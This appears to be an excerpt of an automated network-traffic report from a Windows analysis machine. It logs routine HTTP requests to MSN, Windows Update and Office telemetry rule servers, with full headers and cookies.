Source: global traffic HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=0A576580DC7A6D0124D170C2DDEE6CAA&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=-5438092865908489856&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308|10837393&bcnt=1|1&asid=fb60a030263d460ff8a31e18db70ea3f HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=0A576580DC7A6D0124D170C2DDEE6CAA; _EDGE_S=F=1&SID=1E9460D0D047688427CB7592D1A5693C; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /c.gif?rnd=1732532933075&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=354610ce91cb4454a7edd3a26242369f&activityId=354610ce91cb4454a7edd3a26242369f&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=81A7AD75DE404C4D9504966CD607D61E&MUID=0A576580DC7A6D0124D170C2DDEE6CAA HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0A576580DC7A6D0124D170C2DDEE6CAA; _EDGE_S=F=1&SID=1E9460D0D047688427CB7592D1A5693C; _EDGE_V=1; SM=T
Source: global traffic HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=0A576580DC7A6D0124D170C2DDEE6CAA&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=-5438092865908489856&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=13e7afd074a648f0bd44597f5825964d HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0A576580DC7A6D0124D170C2DDEE6CAA; _EDGE_S=F=1&SID=1E9460D0D047688427CB7592D1A5693C; _EDGE_V=1; _C_ETH=1; msnup=
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/BB1msyCF.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA12sf7A.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/BB1msOP1.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ZHYzBU9XXRw5tHv&MD=5C6y4ED8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
